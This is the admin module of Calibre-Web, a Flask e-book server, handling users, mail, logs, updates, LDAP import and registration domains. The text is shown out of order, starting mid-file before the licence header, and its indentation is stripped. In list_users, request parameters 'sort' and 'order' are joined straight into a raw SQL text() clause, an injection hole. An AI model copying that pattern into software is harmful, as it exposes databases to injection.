content.role = constants.selected_roles(to_save)
if anonymous:
content.role |= constants.ROLE_ANONYMOUS
else:
content.role &= ~constants.ROLE_ANONYMOUS
val = [int(k[5:]) for k in to_save if k.startswith('show_')]
sidebar = get_sidebar_config()
for element in sidebar:
value = element['visibility']
if value in val and not content.check_visibility(value):
content.sidebar_view |= value
elif value not in val and content.check_visibility(value):
content.sidebar_view &= ~value
if to_save.get("Show_detail_random"):
content.sidebar_view |= constants.DETAIL_RANDOM
else:
content.sidebar_view &= ~constants.DETAIL_RANDOM
old_state = content.kobo_only_shelves_sync
content.kobo_only_shelves_sync = int(to_save.get("kobo_only_shelves_sync") == "on") or 0
# 1 -> 0: nothing has to be done
# 0 -> 1: all synced books have to be added to archived books, + currently synced shelfs
# which don't have to be synced have to be removed (added to Shelf archive)
if old_state == 0 and content.kobo_only_shelves_sync == 1:
kobo_sync_status.update_on_sync_shelfs(content.id)
if to_save.get("default_language"):
content.default_language = to_save["default_language"]
if to_save.get("locale"):
content.locale = to_save["locale"]
try:
if to_save.get("email", content.email) != content.email:
content.email = check_email(to_save["email"])
# Query User name, if not existing, change
if to_save.get("name", content.name) != content.name:
if to_save.get("name") == "Guest":
raise Exception(_("Guest Name can't be changed"))
content.name = check_username(to_save["name"])
if to_save.get("kindle_mail") != content.kindle_mail:
content.kindle_mail = valid_email(to_save["kindle_mail"]) if to_save["kindle_mail"] else ""
except Exception as ex:
log.error(ex)
flash(str(ex), category="error")
return render_title_template("user_edit.html",
translations=translations,
languages=languages,
mail_configured=config.get_mail_server_configured(),
kobo_support=kobo_support,
new_user=0,
content=content,
config=config,
registered_oauth=oauth_check,
title=_(u"Edit User %(nick)s", nick=content.name),
page="edituser")
try:
ub.session_commit()
flash(_(u"User '%(nick)s' updated", nick=content.name), category="success")
except IntegrityError as ex:
ub.session.rollback()
log.error("An unknown error occurred while changing user: {}".format(str(ex)))
flash(_(u"An unknown error occurred. Please try again later."), category="error")
except OperationalError:
ub.session.rollback()
log.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
return ""
@admi.route("/admin/user/new", methods=["GET", "POST"])
@login_required
@admin_required
def new_user():
content = ub.User()
languages = calibre_db.speaking_language()
translations = [LC('en')] + babel.list_translations()
kobo_support = feature_support['kobo'] and config.config_kobo_sync
if request.method == "POST":
to_save = request.form.to_dict()
_handle_new_user(to_save, content, languages, translations, kobo_support)
else:
content.role = config.config_default_role
content.sidebar_view = config.config_default_show
content.locale = config.config_default_locale
content.default_language = config.config_default_language
return render_title_template("user_edit.html", new_user=1, content=content,
config=config, translations=translations,
languages=languages, title=_(u"Add new user"), page="newuser",
kobo_support=kobo_support, registered_oauth=oauth_check)
@admi.route("/admin/mailsettings")
@login_required
@admin_required
def edit_mailsettings():
content = config.get_mail_settings()
return render_title_template("email_edit.html", content=content, title=_(u"Edit E-mail Server Settings"),
page="mailset", feature_support=feature_support)
@admi.route("/admin/mailsettings", methods=["POST"])
@login_required
@admin_required
def update_mailsettings():
to_save = request.form.to_dict()
_config_int(to_save, "mail_server_type")
if to_save.get("invalidate"):
config.mail_gmail_token = {}
try:
flag_modified(config, "mail_gmail_token")
except AttributeError:
pass
elif to_save.get("gmail"):
try:
config.mail_gmail_token = services.gmail.setup_gmail(config.mail_gmail_token)
flash(_(u"Gmail Account Verification Successful"), category="success")
except Exception as ex:
flash(str(ex), category="error")
log.error(ex)
return edit_mailsettings()
else:
_config_string(to_save, "mail_server")
_config_int(to_save, "mail_port")
_config_int(to_save, "mail_use_ssl")
_config_string(to_save, "mail_login")
_config_string(to_save, "mail_password")
_config_string(to_save, "mail_from")
_config_int(to_save, "mail_size", lambda y: int(y)*1024*1024)
try:
config.save()
except (OperationalError, InvalidRequestError):
ub.session.rollback()
log.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
return edit_mailsettings()
if to_save.get("test"):
if current_user.email:
result = send_test_mail(current_user.email, current_user.name)
if result is None:
flash(_(u"Test e-mail queued for sending to %(email)s, please check Tasks for result",
email=current_user.email), category="info")
else:
flash(_(u"There was an error sending the Test e-mail: %(res)s", res=result), category="error")
else:
flash(_(u"Please configure your e-mail address first..."), category="error")
else:
flash(_(u"E-mail server settings updated"), category="success")
return edit_mailsettings()
@admi.route("/admin/user/<int:user_id>", methods=["GET", "POST"])
@login_required
@admin_required
def edit_user(user_id):
content = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first() # type: ub.User
if not content or (not config.config_anonbrowse and content.name == "Guest"):
flash(_(u"User not found"), category="error")
return redirect(url_for('admin.admin'))
languages = calibre_db.speaking_language(return_all_languages=True)
translations = babel.list_translations() + [LC('en')]
kobo_support = feature_support['kobo'] and config.config_kobo_sync
if request.method == "POST":
to_save = request.form.to_dict()
resp = _handle_edit_user(to_save, content, languages, translations, kobo_support)
if resp:
return resp
return render_title_template("user_edit.html",
translations=translations,
languages=languages,
new_user=0,
content=content,
config=config,
registered_oauth=oauth_check,
mail_configured=config.get_mail_server_configured(),
kobo_support=kobo_support,
title=_(u"Edit User %(nick)s", nick=content.name),
page="edituser")
@admi.route("/admin/resetpassword/<int:user_id>")
@login_required
@admin_required
def reset_user_password(user_id):
if current_user is not None and current_user.is_authenticated:
ret, message = reset_password(user_id)
if ret == 1:
log.debug(u"Password for user %s reset", message)
flash(_(u"Password for user %(user)s reset", user=message), category="success")
elif ret == 0:
log.error(u"An unknown error occurred. Please try again later.")
flash(_(u"An unknown error occurred. Please try again later."), category="error")
else:
log.error(u"Please configure the SMTP mail settings first...")
flash(_(u"Please configure the SMTP mail settings first..."), category="error")
return redirect(url_for('admin.admin'))
@admi.route("/admin/logfile")
@login_required
@admin_required
def view_logfile():
logfiles = {0: logger.get_logfile(config.config_logfile),
1: logger.get_accesslogfile(config.config_access_logfile)}
return render_title_template("logviewer.html",
title=_(u"Logfile viewer"),
accesslog_enable=config.config_access_log,
log_enable=bool(config.config_logfile != logger.LOG_TO_STDOUT),
logfiles=logfiles,
page="logfile")
@admi.route("/ajax/log/<int:logtype>")
@login_required
@admin_required
def send_logfile(logtype):
if logtype == 1:
logfile = logger.get_accesslogfile(config.config_access_logfile)
return send_from_directory(os.path.dirname(logfile),
os.path.basename(logfile))
if logtype == 0:
logfile = logger.get_logfile(config.config_logfile)
return send_from_directory(os.path.dirname(logfile),
os.path.basename(logfile))
else:
return ""
@admi.route("/admin/logdownload/<int:logtype>")
@login_required
@admin_required
def download_log(logtype):
if logtype == 0:
file_name = logger.get_logfile(config.config_logfile)
elif logtype == 1:
file_name = logger.get_accesslogfile(config.config_access_logfile)
else:
abort(404)
if logger.is_valid_logfile(file_name):
return debug_info.assemble_logfiles(file_name)
abort(404)
@admi.route("/admin/debug")
@login_required
@admin_required
def download_debug():
return debug_info.send_debug()
@admi.route("/get_update_status", methods=['GET'])
@login_required
@admin_required
def get_update_status():
if feature_support['updater']:
log.info(u"Update status requested")
return updater_thread.get_available_updates(request.method, locale=get_locale())
else:
return ''
@admi.route("/get_updater_status", methods=['GET', 'POST'])
@login_required
@admin_required
def get_updater_status():
status = {}
if feature_support['updater']:
if request.method == "POST":
commit = request.form.to_dict()
if "start" in commit and commit['start'] == 'True':
text = {
"1": _(u'Requesting update package'),
"2": _(u'Downloading update package'),
"3": _(u'Unzipping update package'),
"4": _(u'Replacing files'),
"5": _(u'Database connections are closed'),
"6": _(u'Stopping server'),
"7": _(u'Update finished, please press okay and reload page'),
"8": _(u'Update failed:') + u' ' + _(u'HTTP Error'),
"9": _(u'Update failed:') + u' ' + _(u'Connection error'),
"10": _(u'Update failed:') + u' ' + _(u'Timeout while establishing connection'),
"11": _(u'Update failed:') + u' ' + _(u'General error'),
"12": _(u'Update failed:') + u' ' + _(u'Update file could not be saved in temp dir'),
"13": _(u'Update failed:') + u' ' + _(u'Files could not be replaced during update')
}
status['text'] = text
updater_thread.status = 0
updater_thread.resume()
status['status'] = updater_thread.get_update_status()
elif request.method == "GET":
try:
status['status'] = updater_thread.get_update_status()
if status['status'] == -1:
status['status'] = 7
except Exception:
status['status'] = 11
return json.dumps(status)
return ''
def ldap_import_create_user(user, user_data):
user_login_field = extract_dynamic_field_from_filter(user, config.config_ldap_user_object)
try:
username = user_data[user_login_field][0].decode('utf-8')
except KeyError as ex:
log.error("Failed to extract LDAP user: %s - %s", user, ex)
message = _(u'Failed to extract at least One LDAP User')
return 0, message
# check for duplicate username
if ub.session.query(ub.User).filter(func.lower(ub.User.name) == username.lower()).first():
# if ub.session.query(ub.User).filter(ub.User.name == username).first():
log.warning("LDAP User %s Already in Database", user_data)
return 0, None
kindlemail = ''
if 'mail' in user_data:
useremail = user_data['mail'][0].decode('utf-8')
if len(user_data['mail']) > 1:
kindlemail = user_data['mail'][1].decode('utf-8')
else:
log.debug('No Mail Field Found in LDAP Response')
useremail = username + '@email.com'
try:
# check for duplicate email
useremail = check_email(useremail)
except Exception as ex:
log.warning("LDAP Email Error: {}, {}".format(user_data, ex))
return 0, None
content = ub.User()
content.name = username
content.password = '' # dummy password which will be replaced by ldap one
content.email = useremail
content.kindle_mail = kindlemail
content.default_language = config.config_default_language
content.locale = config.config_default_locale
content.role = config.config_default_role
content.sidebar_view = config.config_default_show
content.allowed_tags = config.config_allowed_tags
content.denied_tags = config.config_denied_tags
content.allowed_column_value = config.config_allowed_column_value
content.denied_column_value = config.config_denied_column_value
ub.session.add(content)
try:
ub.session.commit()
return 1, None # increase no of users
except Exception as ex:
log.warning("Failed to create LDAP user: %s - %s", user, ex)
ub.session.rollback()
message = _(u'Failed to Create at Least One LDAP User')
return 0, message
@admi.route('/import_ldap_users')
@login_required
@admin_required
def import_ldap_users():
showtext = {}
try:
new_users = services.ldap.get_group_members(config.config_ldap_group_name)
except (services.ldap.LDAPException, TypeError, AttributeError, KeyError) as e:
log.debug_or_exception(e)
showtext['text'] = _(u'Error: %(ldaperror)s', ldaperror=e)
return json.dumps(showtext)
if not new_users:
log.debug('LDAP empty response')
showtext['text'] = _(u'Error: No user returned in response of LDAP server')
return json.dumps(showtext)
imported = 0
for username in new_users:
user = username.decode('utf-8')
if '=' in user:
# if member object field is empty take user object as filter
if config.config_ldap_member_user_object:
query_filter = config.config_ldap_member_user_object
else:
query_filter = config.config_ldap_user_object
try:
user_identifier = extract_user_identifier(user, query_filter)
except Exception as ex:
log.warning(ex)
continue
else:
user_identifier = user
query_filter = None
try:
user_data = services.ldap.get_object_details(user=user_identifier, query_filter=query_filter)
except AttributeError as ex:
log.debug_or_exception(ex)
continue
if user_data:
user_count, message = ldap_import_create_user(user, user_data)
if message:
showtext['text'] = message
else:
imported += user_count
else:
log.warning("LDAP User: %s Not Found", user)
showtext['text'] = _(u'At Least One LDAP User Not Found in Database')
if not showtext:
showtext['text'] = _(u'{} User Successfully Imported'.format(imported))
return json.dumps(showtext)
def extract_user_data_from_field(user, field):
match = re.search(field + r"=([\.\d\s\w-]+)", user, re.IGNORECASE | re.UNICODE)
if match:
return match.group(1)
else:
raise Exception("Could Not Parse LDAP User: {}".format(user))
def extract_dynamic_field_from_filter(user, filtr):
match = re.search("([a-zA-Z0-9-]+)=%s", filtr, re.IGNORECASE | re.UNICODE)
if match:
return match.group(1)
else:
raise Exception("Could Not Parse LDAP Userfield: {}", user)
def extract_user_identifier(user, filtr):
dynamic_field = extract_dynamic_field_from_filter(user, filtr)
return extract_user_data_from_field(user, dynamic_field)
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler, GammaC0de, vuolter
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import re
import base64
import json
import time
import operator
from datetime import datetime, timedelta
from babel import Locale as LC
from babel.dates import format_datetime
from flask import Blueprint, flash, redirect, url_for, abort, request, make_response, send_from_directory, g, Response
from flask_login import login_required, current_user, logout_user, confirm_login
from flask_babel import gettext as _
from flask import session as flask_session
from sqlalchemy import and_
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy.exc import IntegrityError, OperationalError, InvalidRequestError
from sqlalchemy.sql.expression import func, or_, text
from . import constants, logger, helper, services
from . import db, calibre_db, ub, web_server, get_locale, config, updater_thread, babel, gdriveutils, kobo_sync_status
from .helper import check_valid_domain, send_test_mail, reset_password, generate_password_hash, check_email, \
valid_email, check_username
from .gdriveutils import is_gdrive_ready, gdrive_support
from .render_template import render_title_template, get_sidebar_config
from . import debug_info, _BABEL_TRANSLATIONS
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
log = logger.create()
feature_support = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo),
'updater': constants.UPDATER_AVAILABLE,
'gmail': bool(services.gmail)
}
try:
import rarfile # pylint: disable=unused-import
feature_support['rar'] = True
except (ImportError, SyntaxError):
feature_support['rar'] = False
try:
from .oauth_bb import oauth_check, oauthblueprints
feature_support['oauth'] = True
except ImportError as err:
log.debug('Cannot import Flask-Dance, login with Oauth will not work: %s', err)
feature_support['oauth'] = False
oauthblueprints = []
oauth_check = {}
feature_support['gdrive'] = gdrive_support
admi = Blueprint('admin', __name__)
def admin_required(f):
"""
Checks if current_user.role == 1
"""
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_admin():
return f(*args, **kwargs)
abort(403)
return inner
@admi.before_app_request
def before_request():
# make remember me function work
if current_user.is_authenticated:
confirm_login()
if not ub.check_user_session(current_user.id, flask_session.get('_id')) and 'opds' not in request.path:
logout_user()
g.constants = constants
g.user = current_user
g.allow_registration = config.config_public_reg
g.allow_anonymous = config.config_anonbrowse
g.allow_upload = config.config_uploading
g.current_theme = config.config_theme
g.config_authors_max = config.config_authors_max
g.shelves_access = ub.session.query(ub.Shelf).filter(
or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == current_user.id)).order_by(ub.Shelf.name).all()
if '/static/' not in request.path and not config.db_configured and \
request.endpoint not in ('admin.ajax_db_config',
'admin.simulatedbchange',
'admin.db_configuration',
'web.login',
'web.logout',
'admin.load_dialogtexts',
'admin.ajax_pathchooser'):
return redirect(url_for('admin.db_configuration'))
@admi.route("/admin")
@login_required
def admin_forbidden():
abort(403)
@admi.route("/shutdown", methods=["POST"])
@login_required
@admin_required
def shutdown():
task = request.get_json().get('parameter', -1)
showtext = {}
if task in (0, 1): # valid commandos received
# close all database connections
calibre_db.dispose()
ub.dispose()
if task == 0:
showtext['text'] = _(u'Server restarted, please reload page')
else:
showtext['text'] = _(u'Performing shutdown of server, please close window')
# stop gevent/tornado server
web_server.stop(task == 0)
return json.dumps(showtext)
if task == 2:
log.warning("reconnecting to calibre database")
calibre_db.reconnect_db(config, ub.app_DB_path)
showtext['text'] = _(u'Reconnect successful')
return json.dumps(showtext)
showtext['text'] = _(u'Unknown command')
return json.dumps(showtext), 400
@admi.route("/admin/view")
@login_required
@admin_required
def admin():
version = updater_thread.get_current_version_info()
if version is False:
commit = _(u'Unknown')
else:
if 'datetime' in version:
commit = version['datetime']
tz = timedelta(seconds=time.timezone if (time.localtime().tm_isdst == 0) else time.altzone)
form_date = datetime.strptime(commit[:19], "%Y-%m-%dT%H:%M:%S")
if len(commit) > 19: # check if string has timezone
if commit[19] == '+':
form_date -= timedelta(hours=int(commit[20:22]), minutes=int(commit[23:]))
elif commit[19] == '-':
form_date += timedelta(hours=int(commit[20:22]), minutes=int(commit[23:]))
commit = format_datetime(form_date - tz, format='short', locale=get_locale())
else:
commit = version['version']
allUser = ub.session.query(ub.User).all()
email_settings = config.get_mail_settings()
kobo_support = feature_support['kobo'] and config.config_kobo_sync
return render_title_template("admin.html", allUser=allUser, email=email_settings, config=config, commit=commit,
feature_support=feature_support, kobo_support=kobo_support,
title=_(u"Admin page"), page="admin")
@admi.route("/admin/dbconfig", methods=["GET", "POST"])
@login_required
@admin_required
def db_configuration():
if request.method == "POST":
return _db_configuration_update_helper()
return _db_configuration_result()
@admi.route("/admin/config", methods=["GET"])
@login_required
@admin_required
def configuration():
return render_title_template("config_edit.html",
config=config,
provider=oauthblueprints,
feature_support=feature_support,
title=_(u"Basic Configuration"), page="config")
@admi.route("/admin/ajaxconfig", methods=["POST"])
@login_required
@admin_required
def ajax_config():
return _configuration_update_helper()
@admi.route("/admin/ajaxdbconfig", methods=["POST"])
@login_required
@admin_required
def ajax_db_config():
return _db_configuration_update_helper()
@admi.route("/admin/alive", methods=["GET"])
@login_required
@admin_required
def calibreweb_alive():
return "", 200
@admi.route("/admin/viewconfig")
@login_required
@admin_required
def view_configuration():
read_column = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all()
restrict_columns = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all()
languages = calibre_db.speaking_language()
translations = [LC('en')] + babel.list_translations()
return render_title_template("config_view_edit.html", conf=config, readColumns=read_column,
restrictColumns=restrict_columns,
languages=languages,
translations=translations,
title=_(u"UI Configuration"), page="uiconfig")
@admi.route("/admin/usertable")
@login_required
@admin_required
def edit_user_table():
visibility = current_user.view_settings.get('useredit', {})
languages = calibre_db.speaking_language()
translations = babel.list_translations() + [LC('en')]
allUser = ub.session.query(ub.User)
tags = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
if config.config_restricted_column:
custom_values = calibre_db.session.query(db.cc_classes[config.config_restricted_column]).all()
else:
custom_values = []
if not config.config_anonbrowse:
allUser = allUser.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
kobo_support = feature_support['kobo'] and config.config_kobo_sync
return render_title_template("user_table.html",
users=allUser.all(),
tags=tags,
custom_values=custom_values,
translations=translations,
languages=languages,
visiblility=visibility,
all_roles=constants.ALL_ROLES,
kobo_support=kobo_support,
sidebar_settings=constants.sidebar_settings,
title=_(u"Edit Users"),
page="usertable")
@admi.route("/ajax/listusers")
@login_required
@admin_required
def list_users():
off = int(request.args.get("offset") or 0)
limit = int(request.args.get("limit") or 10)
search = request.args.get("search")
sort = request.args.get("sort", "id")
order = request.args.get("order", "").lower()
state = None
if sort == "state":
state = json.loads(request.args.get("state", "[]"))
if sort != "state" and order:
order = text(sort + " " + order)
elif not state:
order = ub.User.id.asc()
all_user = ub.session.query(ub.User)
if not config.config_anonbrowse:
all_user = all_user.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
total_count = filtered_count = all_user.count()
if search:
all_user = all_user.filter(or_(func.lower(ub.User.name).ilike("%" + search + "%"),
func.lower(ub.User.kindle_mail).ilike("%" + search + "%"),
func.lower(ub.User.email).ilike("%" + search + "%")))
if state:
users = calibre_db.get_checkbox_sorted(all_user.all(), state, off, limit, request.args.get("order", "").lower())
else:
users = all_user.order_by(order).offset(off).limit(limit).all()
if search:
filtered_count = len(users)
for user in users:
if user.default_language == "all":
user.default = _("All")
else:
user.default = LC.parse(user.default_language).get_language_name(get_locale())
table_entries = {'totalNotFiltered': total_count, 'total': filtered_count, "rows": users}
js_list = json.dumps(table_entries, cls=db.AlchemyEncoder)
response = make_response(js_list)
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@admi.route("/ajax/deleteuser", methods=['POST'])
@login_required
@admin_required
def delete_user():
user_ids = request.form.to_dict(flat=False)
users = None
if "userid[]" in user_ids:
users = ub.session.query(ub.User).filter(ub.User.id.in_(user_ids['userid[]'])).all()
elif "userid" in user_ids:
users = ub.session.query(ub.User).filter(ub.User.id == user_ids['userid'][0]).all()
count = 0
errors = list()
success = list()
if not users:
log.error("User not found")
return Response(json.dumps({'type': "danger", 'message': _("User not found")}), mimetype='application/json')
for user in users:
try:
message = _delete_user(user)
count += 1
except Exception as ex:
log.error(ex)
errors.append({'type': "danger", 'message': str(ex)})
if count == 1:
log.info("User {} deleted".format(user_ids))
success = [{'type': "success", 'message': message}]
elif count > 1:
log.info("Users {} deleted".format(user_ids))
success = [{'type': "success", 'message': _("{} users deleted successfully").format(count)}]
success.extend(errors)
return Response(json.dumps(success), mimetype='application/json')
@admi.route("/ajax/getlocale")
@login_required
@admin_required
def table_get_locale():
locale = babel.list_translations() + [LC('en')]
ret = list()
current_locale = get_locale()
for loc in locale:
ret.append({'value': str(loc), 'text': loc.get_language_name(current_locale)})
return json.dumps(ret)
@admi.route("/ajax/getdefaultlanguage")
@login_required
@admin_required
def table_get_default_lang():
languages = calibre_db.speaking_language()
ret = list()
ret.append({'value': 'all', 'text': _('Show All')})
for lang in languages:
ret.append({'value': lang.lang_code, 'text': lang.name})
return json.dumps(ret)
@admi.route("/ajax/editlistusers/<param>", methods=['POST'])
@login_required
@admin_required
def edit_list_user(param):
vals = request.form.to_dict(flat=False)
all_user = ub.session.query(ub.User)
if not config.config_anonbrowse:
all_user = all_user.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
# only one user is posted
if "pk" in vals:
users = [all_user.filter(ub.User.id == vals['pk'][0]).one_or_none()]
else:
if "pk[]" in vals:
users = all_user.filter(ub.User.id.in_(vals['pk[]'])).all()
else:
return _("Malformed request"), 400
if 'field_index' in vals:
vals['field_index'] = vals['field_index'][0]
if 'value' in vals:
vals['value'] = vals['value'][0]
elif not ('value[]' in vals):
return _("Malformed request"), 400
for user in users:
try:
if param in ['denied_tags', 'allowed_tags', 'allowed_column_value', 'denied_column_value']:
if 'value[]' in vals:
setattr(user, param, prepare_tags(user, vals['action'][0], param, vals['value[]']))
else:
setattr(user, param, vals['value'].strip())
else:
vals['value'] = vals['value'].strip()
if param == 'name':
if user.name == "Guest":
raise Exception(_("Guest Name can't be changed"))
user.name = check_username(vals['value'])
elif param =='email':
user.email = check_email(vals['value'])
elif param =='kobo_only_shelves_sync':
user.kobo_only_shelves_sync = int(vals['value'] == 'true')
elif param == 'kindle_mail':
user.kindle_mail = valid_email(vals['value']) if vals['value'] else ""
elif param.endswith('role'):
value = int(vals['field_index'])
if user.name == "Guest" and value in \
[constants.ROLE_ADMIN, constants.ROLE_PASSWD, constants.ROLE_EDIT_SHELFS]:
raise Exception(_("Guest can't have this role"))
# check for valid value, last on checks for power of 2 value
if value > 0 and value <= constants.ROLE_VIEWER and (value & value-1 == 0 or value == 1):
if vals['value'] == 'true':
user.role |= value
elif vals['value'] == 'false':
if value == constants.ROLE_ADMIN:
if not ub.session.query(ub.User).\
filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != user.id).count():
return Response(
json.dumps([{'type': "danger",
'message':_(u"No admin user remaining, can't remove admin role",
nick=user.name)}]), mimetype='application/json')
user.role &= ~value
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid role"))
elif param.startswith('sidebar'):
value = int(vals['field_index'])
if user.name == "Guest" and value == constants.SIDEBAR_READ_AND_UNREAD:
raise Exception(_("Guest can't have this view"))
# check for valid value, last on checks for power of 2 value
if value > 0 and value <= constants.SIDEBAR_LIST and (value & value-1 == 0 or value == 1):
if vals['value'] == 'true':
user.sidebar_view |= value
elif vals['value'] == 'false':
user.sidebar_view &= ~value
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid view"))
elif param == 'locale':
if user.name == "Guest":
raise Exception(_("Guest's Locale is determined automatically and can't be set"))
if vals['value'] in _BABEL_TRANSLATIONS:
user.locale = vals['value']
else:
raise Exception(_("No Valid Locale Given"))
elif param == 'default_language':
languages = calibre_db.session.query(db.Languages) \
.join(db.books_languages_link) \
.join(db.Books) \
.filter(calibre_db.common_filters()) \
.group_by(text('books_languages_link.lang_code')).all()
lang_codes = [lang.lang_code for lang in languages] + ["all"]
if vals['value'] in lang_codes:
user.default_language = vals['value']
else:
raise Exception(_("No Valid Book Language Given"))
else:
return _("Parameter not found"), 400
except Exception as ex:
log.debug_or_exception(ex)
return str(ex), 400
ub.session_commit()
return ""
@admi.route("/ajax/user_table_settings", methods=['POST'])
@login_required
@admin_required
def update_table_settings():
current_user.view_settings['useredit'] = json.loads(request.data)
try:
try:
flag_modified(current_user, "view_settings")
except AttributeError:
pass
ub.session.commit()
except (InvalidRequestError, OperationalError):
log.error("Invalid request received: {}".format(request))
return "Invalid request", 400
return ""
def check_valid_read_column(column):
if column != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == column) \
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
def check_valid_restricted_column(column):
if column != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == column) \
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
@admi.route("/admin/viewconfig", methods=["POST"])
@login_required
@admin_required
def update_view_configuration():
to_save = request.form.to_dict()
_config_string(to_save, "config_calibre_web_title")
_config_string(to_save, "config_columns_to_ignore")
if _config_string(to_save, "config_title_regex"):
calibre_db.update_title_sort(config)
if not check_valid_read_column(to_save.get("config_read_column", "0")):
flash(_(u"Invalid Read Column"), category="error")
log.debug("Invalid Read column")
return view_configuration()
_config_int(to_save, "config_read_column")
if not check_valid_restricted_column(to_save.get("config_restricted_column", "0")):
flash(_(u"Invalid Restricted Column"), category="error")
log.debug("Invalid Restricted Column")
return view_configuration()
_config_int(to_save, "config_restricted_column")
_config_int(to_save, "config_theme")
_config_int(to_save, "config_random_books")
_config_int(to_save, "config_books_per_page")
_config_int(to_save, "config_authors_max")
_config_string(to_save, "config_default_language")
_config_string(to_save, "config_default_locale")
config.config_default_role = constants.selected_roles(to_save)
config.config_default_role &= ~constants.ROLE_ANONYMOUS
config.config_default_show = sum(int(k[5:]) for k in to_save if k.startswith('show_'))
if "Show_detail_random" in to_save:
config.config_default_show |= constants.DETAIL_RANDOM
config.save()
flash(_(u"Calibre-Web configuration updated"), category="success")
log.debug("Calibre-Web configuration updated")
before_request()
return view_configuration()
@admi.route("/ajax/loaddialogtexts/<element_id>", methods=['POST'])
@login_required
def load_dialogtexts(element_id):
texts = {"header": "", "main": "", "valid": 1}
if element_id == "config_delete_kobo_token":
texts["main"] = _('Do you really want to delete the Kobo Token?')
elif element_id == "btndeletedomain":
texts["main"] = _('Do you really want to delete this domain?')
elif element_id == "btndeluser":
texts["main"] = _('Do you really want to delete this user?')
elif element_id == "delete_shelf":
texts["main"] = _('Are you sure you want to delete this shelf?')
elif element_id == "select_locale":
texts["main"] = _('Are you sure you want to change locales of selected user(s)?')
elif element_id == "select_default_language":
texts["main"] = _('Are you sure you want to change visible book languages for selected user(s)?')
elif element_id == "role":
texts["main"] = _('Are you sure you want to change the selected role for the selected user(s)?')
elif element_id == "restrictions":
texts["main"] = _('Are you sure you want to change the selected restrictions for the selected user(s)?')
elif element_id == "sidebar_view":
texts["main"] = _('Are you sure you want to change the selected visibility restrictions for the selected user(s)?')
elif element_id == "kobo_only_shelves_sync":
texts["main"] = _('Are you sure you want to change shelf sync behavior for the selected user(s)?')
elif element_id == "db_submit":
texts["main"] = _('Are you sure you want to change Calibre library location?')
elif element_id == "btnfullsync":
texts["main"] = _("Are you sure you want delete Calibre-Web's sync database to force a full sync with your Kobo Reader?")
return json.dumps(texts)
@admi.route("/ajax/editdomain/<int:allow>", methods=['POST'])
@login_required
@admin_required
def edit_domain(allow):
# POST /post
# name: 'username', //name of field (column in db)
# pk: 1 //primary key (record id)
# value: 'superuser!' //new value
vals = request.form.to_dict()
answer = ub.session.query(ub.Registration).filter(ub.Registration.id == vals['pk']).first()
answer.domain = vals['value'].replace('*', '%').replace('?', '_').lower()
return ub.session_commit("Registering Domains edited {}".format(answer.domain))
@admi.route("/ajax/adddomain/<int:allow>", methods=['POST'])
@login_required
@admin_required
def add_domain(allow):
domain_name = request.form.to_dict()['domainname'].replace('*', '%').replace('?', '_').lower()
check = ub.session.query(ub.Registration).filter(ub.Registration.domain == domain_name)\
.filter(ub.Registration.allow == allow).first()
if not check:
new_domain = ub.Registration(domain=domain_name, allow=allow)
ub.session.add(new_domain)
ub.session_commit("Registering Domains added {}".format(domain_name))
return ""
@admi.route("/ajax/deletedomain", methods=['POST'])
@login_required
@admin_required
def delete_domain():
try:
domain_id = request.form.to_dict()['domainid'].replace('*', '%').replace('?', '_').lower()
ub.session.query(ub.Registration).filter(ub.Registration.id == domain_id).delete()
ub.session_commit("Registering Domains deleted {}".format(domain_id))
# If last domain was deleted, add all domains by default
if not ub.session.query(ub.Registration).filter(ub.Registration.allow == 1).count():
new_domain = ub.Registration(domain="%.%", allow=1)
ub.session.add(new_domain)
ub.session_commit("Last Registering Domain deleted, added *.* as default")
except KeyError:
pass
return ""
@admi.route("/ajax/domainlist/<int:allow>")
@login_required
@admin_required
def list_domain(allow):
answer = ub.session.query(ub.Registration).filter(ub.Registration.allow == allow).all()
